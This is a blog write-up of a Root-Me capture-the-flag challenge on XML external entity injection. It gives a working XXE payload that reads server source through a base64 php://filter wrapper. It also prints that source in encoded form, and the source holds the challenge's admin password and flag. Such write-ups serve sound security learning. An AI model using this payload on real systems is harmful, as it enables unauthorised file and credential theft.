Thứ Ba, 4 tháng 2, 2020

[WRITEUP] XML EXTERNAL ENTITY (XXE) INJECTION ROOTME

AFTER TET HOLIDAYS, WE FACE TO THE CORONA(2019-nCoV) VIRUS ,SO WE MUST PROTECT OURSELVES AND LIMIT TO GO TO PUBLIC PLACE . AS A OPTIMIST, IT'S MY RELAXING TIME TO CONTINUE TO SOLVE ROOT-ME CHALLENGE 😃 . TODAY , WE HAVE XXE INJECTION . LET'S START!





FIRST OF ALL , WHAT IS XML ? PLEASE READ IT SLOWLY.


https://www.w3schools.com/xml/xml_whatis.asp
OR WATCH THIS VIDEO ON YOUTUBE FOR FURTHER INFORMATION ABOUT XML ,XXE INJECTION.


https://www.youtube.com/watch?v=DREgLWZqMWg
ALRIGHT! WE HAVE BASIC KNOWLEDGES ABOUT XML & MORE . IN XML , WE HAVE TWO TYPES OF DTD : INTERNAL AND EXTERNAL


DTD IS STANDS FOR DOCUMENT TYPE DEFINITION WHICH DEFINES THE STRUCTURE AND THE LAGEL ELEMENTS AND ATTRIBUTES OF AN XML DOCUMENT . WITH A DTD, GROUPS OF PEOPLE CAN AGREE ON A STANDARD DTD OR DATA STRUCTURE FOR INTERCHANGING DATA 
WITH XXE INJETION ,WE MUST FOCUS ON EXTERNAL ENTITY WHICH HAVE THE SYNTAX BELOW


<!ENTITY entity-name SYSTEM "URL/URI">
AND WE USE XML TO "READ" THIS DTD 
<article>&entity-name;</article> 

EXAMPLE 


<!ENTTITY writer SYSTEM "https://www.article.com/entity.dtd"
<author>&writer;</author>
THE OUTPUT INFORMATION IS :  https://www.article.com/entity.dtd 

AND LET'S LOOK THROUGH THE XXE CHALLENGE OF ROOTME



THE QUESTION IS : "WHAT IS RSS"


RSS is short for Really Simple Syndication and it’s a way to have information delivered to you. instead of you having to go find it.
AND RSS BELONGS TO XML FAMILY . SO CLEARLY , WE MUST INPUT A LINK OF RSS CODE TO VALIDATE THIS CHECKER ENGINE . AFTER SEARCHING , I HAD A SIMPLE SOURCE CODE OF XML RSS ON W3C 

<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">

<channel>
  <title>W3Schools Home Page</title>
  <link>https://www.w3schools.com</link>
  <description>Free web building tutorials</description>
  <item>
    <title>RSS Tutorial</title>
    <link>https://www.w3schools.com/xml/xml_rss.asp</link>
    <description>New RSS tutorial on W3Schools</description>
  </item>
  <item>
    <title>XML Tutorial</title>
    <link>https://www.w3schools.com/xml</link>
    <description>New XML tutorial on W3Schools</description>
  </item>
</channel>

</rss> 
BECAUSE THE INPUT ONLY ACCEPTS  A LINK . WE HAVE TO FIND SOME PLACE WHICH CAN STORAGE THIS CODE , AND I CHOSE PASTEBIN .
https://pastebin.com/raw/9T5CE8Tj
AFTER INPUTING THIS LINK , I COMPLETELY VALIDATED THIS CHECKER ENGINE





FIRST STEP DONE! BUT THE GOAL IS TO RETRIVE THE PASSWORD  . WE MUST READ THE FILE ETC/PASSWD OR THE SOURCE CODE OF THIS CHALL . LET'S USE OUR KNOWLENDGES ABOUT XML AND DDT .

AFTER 3 HOURS SEARCHING AND TESTING , I COMPLETED THE PAYLOAD


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE rss [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"> 
]>
<rss version="2.0">

<channel>
  <title>W3Schools Home Page</title>
  <link>https://www.w3schools.com</link>
  <description>Free web building tutorials</description>
  <item>
    <title>&xxe;</title>
    <link>https://www.w3schools.com/xml/xml_rss.asp</link>
    <description>New RSS tutorial on W3Schools</description>
  </item>
  <item>
    <title>XML Tutorial</title>
    <link>https://www.w3schools.com/xml</link>
    <description>New XML tutorial on W3Schools</description>
  </item>
</channel>

</rss>

THE BLUE ROWS IS WHAT I INJECT TO THE CODE , FORCE THE SERVER TO RESPOND THE SOURCE CODE !


php://filter/read=convert.base64-encode/resource=index.php TO READ THE SOURCE CODE VIA PHP WRAPPER
<title>&xxe;</title> TO PRINT THE VALUE OF FILE TO SCREEN , THIS CODE WAS STORAGED IN ITEM TAG TO PRINT.

AFTER N (N>40) TIME TRYING , I WAS REFUSED BECAUSE OF THE SERVER'S FILTER . SO I DECIDED TO ENCODE IT WITH BASE64 IN PHP WRAPPER QUERY . FORTUNATELY THE OUTPUT IS EXACTLY WHAT I EXPECTED 




 THE BASE64 CODE WAS



PD9waHAKCgplY2hvICc8aHRtbD4nOwplY2hvICc8aGVhZGVyPjx0aXRsZT5YWEU8L3RpdGxlPjwvaGVhZGVyPic7CmVjaG8gJzxib2R5Pic7CmVjaG8gJzxoMz48YSBocmVmPSI/YWN0aW9uPWNoZWNrZXIiPmNoZWNrZXI8L2E+Jm5ic3A7fCZuYnNwOzxhIGhyZWY9Ij9hY3Rpb249YXV0aCI+bG9naW48L2E+PC9oMz48aHIgLz4nOwoKCmlmICggISBpc3NldCgkX0dFVFsnYWN0aW9uJ10pICkgJF9HRVRbJ2FjdGlvbiddPSJjaGVja2VyIjsKCmlmKCRfR0VUWydhY3Rpb24nXSA9PSAiY2hlY2tlciIpewoKCWxpYnhtbF9kaXNhYmxlX2VudGl0eV9sb2FkZXIoZmFsc2UpOwoJbGlieG1sX3VzZV9pbnRlcm5hbF9lcnJvcnModHJ1ZSk7CgoJZWNobyAnPGgyPlJTUyBWYWxpZGl0eSBDaGVja2VyPC9oMj4KCTxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSJpbmRleC5waHAiPgoJPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InVybCIgcGxhY2Vob2xkZXI9Imh0dHA6Ly9ob3N0LnRsZC9yc3MiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiAvPgoJPC9mb3JtPic7CgoKCWlmKGlzc2V0KCRfUE9TVFsidXJsIl0pICYmICEoZW1wdHkoJF9QT1NUWyJ1cmwiXSkpKSB7CgkJJHVybCA9ICRfUE9TVFsidXJsIl07CgkJZWNobyAiPHA+VVJMIDogIi5odG1sZW50aXRpZXMoJHVybCkuIjwvcD4iOwoJCXRyeSB7CiAgICAgICAgICAgICAgICAgICAgJGNoID0gY3VybF9pbml0KCIkdXJsIik7CiAgICAgICAgICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsKICAgICAgICAgICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMyk7CiAgICAgICAgICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VUICwwKTsgCiAgICAgICAgICAgICAgICAgICAgJGluamVjdCA9IGN1cmxfZXhlYyggJGNoICk7CiAgICAgICAgICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgICAgICAgICAgICAgICRzdHJpbmcgPSBzaW1wbGV4bWxfbG9hZF9zdHJpbmcoJGluamVjdCwgbnVsbCwgTElCWE1MX05PRU5UKTsKICAgICAgICAgICAgICAgICAgICBpZiAoICEgaXNfb2JqZWN0KCRzdHJpbmcpKSB0aHJvdyBuZXcgRXhjZXB0aW9uKCJlcnJvciIpOyAKICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICBmb3JlYWNoKCRzdHJpbmctPmNoYW5uZWwtPml0ZW0gYXMgJHJvdyl7CgkJICAgICAgICBwcmludCAiPGJyIC8+IjsKCQkgICAgICAgIHByaW50ICI9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iOwoJCSAgICAgICAgcHJpbnQgIjxiciAvPiI7CgkJICAgICAgICBwcmludCBodG1sZW50aXRpZXMoJHJvdy0+dGl0bGUpOwoJCSAgICAgICAgcHJpbnQgIjxiciAvPiI7CgkJICAgICAgICBwcmludCAiPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09IjsKCQkgICAgICAgIHByaW50ICI8YnIgLz4iOwoJCSAgICAgICAgcHJpbnQgIjxoNCBzdHlsZT0nY29sb3I6IGdyZWVuOyc+WE1MIGRvY3VtZW50IGlzIHZhbGlkPC9oND4iOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiAkZSkgewogICAgICAgICAgICAgICAgICAgIHByaW50ICI8aDQgc3R5bGU9J2NvbG9yOiByZWQ7Jz5YTUwgZG9jdW1lbnQgaXMgbm90IHZhbGlkPC9oND4iOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgIAoJfQp9CgppZigkX0dFVFsnYWN0aW9uJ10gPT0gImF1dGgiKXsKZWNobyAnPHN0cm9uZz5Mb2dpbjwvc3Ryb25nPjxiciAvPjxmb3JtIE1FVEhPRD0iUE9TVCI+CjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ1c2VybmFtZSIgLz4KPGJyIC8+CjxpbnB1dCB0eXBlPSJwYXNzd29yZCIgbmFtZT0icGFzc3dvcmQiIC8+CjxiciAvPgo8aW5wdXQgdHlwZT0ic3VibWl0IiAvPgo8L2Zvcm0+Cic7CmlmKGlzc2V0KCRfUE9TVFsndXNlcm5hbWUnXSwgJF9QT1NUWydwYXNzd29yZCddKSAmJiAhZW1wdHkoJF9QT1NUWyd1c2VybmFtZSddKSAmJiAhZW1wdHkoJF9QT1NUWydwYXNzd29yZCddKSkKCXsKCQkkdXNlcj0kX1BPU1RbInVzZXJuYW1lIl07CgkJJHBhc3M9JF9QT1NUWyJwYXNzd29yZCJdOwoJCWlmKCR1c2VyID09PSAiYWRtaW4iICYmICRwYXNzID09PSAiYzkzNGZlZDE3ZjFjYWMzMDQ1ZGRmZWNhMzRmMzMyYmMiKXsKCgkJCXByaW50ICJGbGFnIDogYzkzNGZlZDE3ZjFjYWMzMDQ1ZGRmZWNhMzRmMzMyYmM8YnIgLz4iOwoKCQl9CgoJfQoKfQoKCmVjaG8gJzwvYm9keT48L2h0bWw+JzsKPz4K

DECODE IT AND I HAD THE FLAG FOR 35 POINTS! 😀 

HAPPY HACKING!




















Phổ Biến

Follow by Email